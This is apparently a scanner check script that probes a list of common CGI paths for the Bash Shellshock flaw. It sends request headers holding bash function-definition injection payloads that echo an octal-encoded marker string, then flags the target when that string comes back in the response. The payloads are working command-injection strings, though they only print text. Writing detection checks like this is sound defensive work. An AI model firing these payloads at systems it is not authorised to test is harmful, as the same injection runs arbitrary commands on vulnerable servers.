#include helpers.inc;
var variants = [
					"/",
					"/administrator.cgi",
					"/admin.cgi",
					"/cgi-bin/admin.cgi",
					"/cgi-bin/FormHandler.cgi",
					"/cgi-bin/FormMail.cgi",
					"/cgi-bin/guestbook.cgi",
					"/cgi-bin/search.cgi",
					"/cgi-sys/addalink.cgi",
					"/cgi-sys/entropybanner.cgi",
					"/cgi-sys/entropysearch.cgi",	
					"/cgi-sys/defaultwebpage.cgi",
					"/cgi-sys/FormMail-clone.cgi",
					"/cgi-sys/domainredirect.cgi",
					"/cgi-bin-sdb/printenv",	
					"/cgi-mod/index.cgi",
					"/cgi-bin/test.cgi",
					"/cgi-bin-sdb/printenv"
				];
// **************************************************************************************							 
function alert(uri, vxml, job)
{	
	var ri = new TReportItem();
	ri.LoadFromFile(vxml);
	ri.affects = uri;
	ri.alertPath = "Scripts/" + vxml; 	
	ri.details = "A header named [bold]" + headerName + "[/bold] was added to the request. Header value: [bold][dark]() { acunetix; }; echo -e \"Content-Type: text/plain\n\"; echo -e \"\\0141\\0143\\0165\\0156\\0145\\0164\\0151\\0170\\0163\\0150\\0145\\0154\\0154\\0163\\0150\\0157\\0143\\0153\"[/dark][/bold]. The magic string [dark][bold]acunetixshellshock[/dark][/bold] was reflected in the response.";
	ri.setHttpInfo(job);
	
	AddReportItem(ri);	
}							 			
// **************************************************************************************
function testURI(uri)
{
	lastJob = new THTTPJob();
	lastJob.verb = "GET";
	lastJob.url  = scanURL;	
	lastJob.uri  = uri;		
	lastJob.addCookies = false;
	headerName 	 = 'Referer';	
	lastJob.request.addHeader(headerName, '() { ' + headerName + '; }; echo -e "Content-Type: text/plain\\n"; echo -e "\\0141\\0143\\0165\\0156\\0145\\0164\\0151\\0170\\0163\\0150\\0145\\0154\\0154\\0163\\0150\\0157\\0143\\0153"', true);
	
	headerName 	 = randStr(10);		
	lastJob.request.addHeader(headerName, '() { ' + headerName + '; }; echo -e "Content-Type: text/plain\\n"; echo -e "\\0141\\0143\\0165\\0156\\0145\\0164\\0151\\0170\\0163\\0150\\0145\\0154\\0154\\0163\\0150\\0157\\0143\\0153"', true);
	var headerName2	 = randStr(10);		
	lastJob.request.addHeader(headerName2, '() { (a)=>\' echo -e "Content-Type: text/plain\\n"; echo -e "\\0141\\0143\\0165\\0156\\0145\\0164\\0151\\0170\\0163\\0150\\0145\\0154\\0154\\0163\\0150\\0157\\0143\\0153"', true);
	lastJob.execute();
	
	if (!lastJob.wasError && !lastJob.notFound) {
		if (lastJob.response.body.indexOf("acunetixshellshock") != -1) {
			alert(uri, 'Bash_RCE.xml', lastJob);
		}
	}
	return false;
}
/***********************************************************************************/
/* main entry point */
for (var i=0; i<variants.length; i++) 
{
	if (testURI(variants[i])) break;	
}
